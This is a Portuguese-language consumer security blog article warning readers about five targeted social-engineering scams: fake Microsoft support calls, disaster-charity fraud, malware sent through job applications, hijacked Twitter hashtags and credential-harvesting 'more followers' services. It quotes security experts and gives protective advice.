Especialistas em segurança indicaram quais os principais novos esquemas para roubar seu dinheiro na Internet; ataques estão cada vez mais personalizados, veja neste artigo o que anda mudando, quais são as técnicas e aprenda como se proteger delas.
Especialistas em segurança indicaram quais os principais novos esquemas para roubar seu dinheiro na Internet; ataques estão cada vez mais personalizados, veja neste artigo o que anda mudando, quais são as técnicas e aprenda como se proteger delas.

Você agora pode conhecer o bastante sobre tecnologia para saber que se trata de um golpe quando um amigo chega no Facebook dizendo que foi assaltado em algum lugar e precisa desesperadamente de dinheiro. Mas os “engenheiros sociais” – criminosos que criam esses esquemas para tentar te enganar, estão sempre um passo à frente.

Os ataques de engenharia social estão ficando cada vez mais específicos, de acordo com Chris Hadnagy, autor do livro Social Engineering: The Art of Human Hacking. “Os ataques direcionados estão proporcionando melhores resultados aos engenheiros sociais”, diz.

Isso significa que eles podem precisar trabalhar mais para descobrir informações pessoais, e que isso pode levar mais tempo, mas a recompensa geralmente costuma ser maior.

“Os ataques agora não são apenas um esforço amplo de spams, enviando um milhão de e-mails com uma oferta de Viagra”, afirma Hadnagy. “Existem agora ataques individuais em que eles vão atrás das pessoas separadamente, uma por uma.”
Confira abaixo cinco novos golpes de engenharia social na web que empregam muito mais envolvimento individual:

1) “Somos da equipe de suporte da Microsoft – queremos ajudar” (“This is Microsoft support – we want to help”)
Hadnagy afirma que um novo tipo de ataque tem atingido muitas pessoas ultimamente. Ele começa com uma ligação telefônica em que alguém afirma ser do serviço de suporte da Microsoft e diz que está ligando por causa de um número anormal de erros que teriam origem no seu computador.

“A pessoa do outro lado da linha diz que quer ajudar na solução porque há uma falha e eles tem feito ligações para usuários licenciados do Windows”, explica Hadnagy. “Faz sentido; você é um usuário licenciado do Windows, tem uma máquina com Windows e ela quer provar isso para você.”

A pessoa que ligou diz para a vítima ir até o event log (visualizador de eventos) da máquina e a acompanha pelos passos até chegar ao log do sistema.
“Todo usuário do Windows terá dezenas de erros neste log, simplesmente porque acontecem pequenas coisas; um serviço trava, algo não inicializa. Sempre existem erros”, afirma Hadnagy. “Mas quando um usuário sem experiência abre isso e vê todos esses erros, parece assustador.”

Nesse ponto, a vítima está desesperadamente pronta para fazer qualquer coisa que o suposto funcionário do “suporte” pedir. O engenheiro social então aconselha-os a ir até o site Teamviewer.com, um serviço de acesso remoto que dá a ele controle da máquina.

Uma vez que o cracker tiver acesso à máquina por meio do Teamviewer, ele pode então instalar algum tipo de rootkit ou outro tipo de malware que permitirá a ele ter acesso contínuo ao sistema, afirma Hadnagy.

2) “Faça uma doação para ajudar as vítimas do (alguma tragédia)!” (“Donate to the hurricane recovery efforts!”)
Golpes de doações para caridade têm sido um problema há anos. A todo momento temos desastres de grandes proporções no mundo, como o terremoto no Haiti ou tsunami no Japão, e os criminosos rapidamente entram no jogo e lançam sites falsos de doações. A melhor maneira de evitar isso é indo a uma organização conhecida e de boa reputação, como a Cruz Vermelha, e iniciar o contato por conta própria se quiser fazer uma doação. No entanto, Hadnagy afirma que surgiu há pouco tempo um tipo particularmente desprezível de golpe de engenharia social direcionado para pessoas que possam ter perdido parentes ou amigos em desastres naturais.

Neste exemplo, Hadnagy diz que, entre 8 e 10 horas após o incidentes, o site aparece dizendo ajudar a encontrar pessoas que possam ter desaparecido no desastre. Eles alegam ter acesso as bases de dados do governo e informações de recuperação. Normalmente os engenheiros não pedem por informações financeiras, mas exigem nomes, endereços e informações de contato, como números de telefone e e-mail.

“Enquanto você está esperando para ouvir sobre a pessoa, recebe um pedido de doação para caridade”, diz Hadnagy. “A pessoa da suposta instituição de caridade normalmente vai iniciar uma conversa e dizer que está coletando contribuições porque tem uma relação mais passional com a causa porque perdeu um membro da família em um desastre parecido. Secretamente, eles sabem que a pessoa que contataram também já perdeu alguém, e isso ajuda a criar uma suposta camaradagem.”

Tocada pela pessoa que entrou em contato, a vítima então oferece um número de cartão de crédito pelo telefone para fazer a doação para “caridade”.
“Agora eles tem seu endereço, seu nome, nome do seu parente e também do seu cartão de crédito. Basicamente todas as informações que eles precisam para cometer um roubo de identidade”, explica Hadnagy.

3) “Sobre sua inscrição para a vaga de emprego…” (“About your job application…”)
Tanto pessoas buscando empregos quanto empresas de recrutamento estão sendo atacadas por engenheiros sociais.
“Esse é um golpe perigoso, para os dois lados”, afirma Hadnagy. “Seja a pessoa buscando trabalho ou a companhia postando novas vagas, ambas as partes estão dizendo ‘estou disposto a aceitar arquivos anexos e informações de estranhos.”

De acordo com um alerta do FBI, mais de US$ 150 mil foram roubados de uma empresa americana por meio de uma transferência não-autorizada como resultado de um e-mail com malware que a companhia recebeu a partir de uma oferta de emprego.

“O malware estava incorporado em um e-mail de resposta a uma vaga de emprego que a companhia colocou em um site de recrutamento e permitiu ao cracker conseguir as credenciais bancárias online da pessoa que estava autorizada a realizar transações financeiras na companhia”, afirma o aviso do FBI. “O invasor alterou as configurações da conta para permitir o envio de transferências protegidas, sendo uma para a Ucrânia e duas para contas domésticas.”

4) “@pessoanoTwitter, o que você pensa sobre o que a Dilma disse sobre #desemprego? http://shar.es/HNGAt” (“@Twitterguy, what do you think about what Obama said on #cybersecurity? http://shar.es/HNGAt”)

Os engenheiros sociais estão observando o que as pessoas estão tuitando e usando essa informação para realizar ataques que parecem mais críveis. Uma maneira disso acontecer é na forma de hashtags populares, de acordo com a companhia de segurança Sophos. Na verdade, o início da nova temporada da série “Glee” no começo deste mês na Inglaterra fez com que os cibercriminosos “sequestrassem” a hashtag #gleeonsky por várias horas. A operadora de TV por assinatura Sky pagou para usar a hashtag como uma forme de divulgar a nova temporada, mas os spammers tomaram conta dela rapidamente e começaram a incorporar links maliciosos nos tuítes com o termo.

“Obviamente que os spammers podem escolher redirecionar para qualquer site que quiserem uma vez que você tenha clicado no link”, afirma o consultor sênior de tecnologia da Sophos, Graham Cluley. “Poderia ser um site de phishing desenvolvido para roubar suas credenciais no Twitter, uma farmácia falsa ou um site pornô.”
“Acho que veremos ainda mais ataques desse tipo em mídias sociais por causa da maneira como as pessoas clicam nesses links”, afirma Hadnagy.

5) “Saiba como ter mais seguidores no Twitter!” (“Get more Twitter followers!”)
A Sophos também faz um alerta sobre serviços que dizem conseguir mais seguidores no Twitter. De acordo com Cluley, serão cada vez mais comuns mensagens como “QUEREM MAIS SEGUIDORES? EU VOU TE SEGUIR DE VOLTA SE VOCÊ ME SEGUIR – (LINK)”.

Clicar nesse link leva o usuário para um serviço na web que promete conseguir muitos novos seguidores.
O próprio Cluley criou uma conta teste para ver o que acontecia.
“As páginas pedem para você digitar seu nome de usuário e senha do Twitter”, afirma Cluley em um post no blog sobre o experimento. “Isso deveria fazer você sair correndo – por que um site de terceiros deveria pedir suas credenciais? O que os donos dessas páginas estão planejando fazer com seu nome de usuário e senha? É possível confiar neles?”

Cluley também colocou que o serviço admite não ser apoiado ou afiliado ao Twitter, e que para usar o serviço, você precisar autorizar o aplicativo a acessar sua conta. A essa altura, todas as garantias de segurança e uso ético já eram, afirma o especialista. O próprio Twitter avisa aos usuários para tomarem cuidado com esses serviços em sua página de informações de ajuda.

“Quando você fornece seu nome de usuário e senha para outro site ou aplicativo, está passando o controle da sua conta para outra pessoa”, explica uma das regras do Twitter. “Elas podem então postar atualizações e links duplicados, maliciosos ou spam, enviar mensagens diretas não desejadas, seguir outros usuários de modo agressivo, ou violar outras regras do Twitter com a sua conta. Alguns aplicativos de terceiros já foram implicados em atos de comportamento de spam, fraude, venda de nomes de usuários e senhas e golpes de phishing. Por favor, não forneça seu nome de usuário e senha para aplicativos de terceiros que você não conheça ou tenha pesquisado com cuidado antes.”
 

SECURITY MASTER Copyright © 2011 -- Template created by Security Master -- Powered by Blogger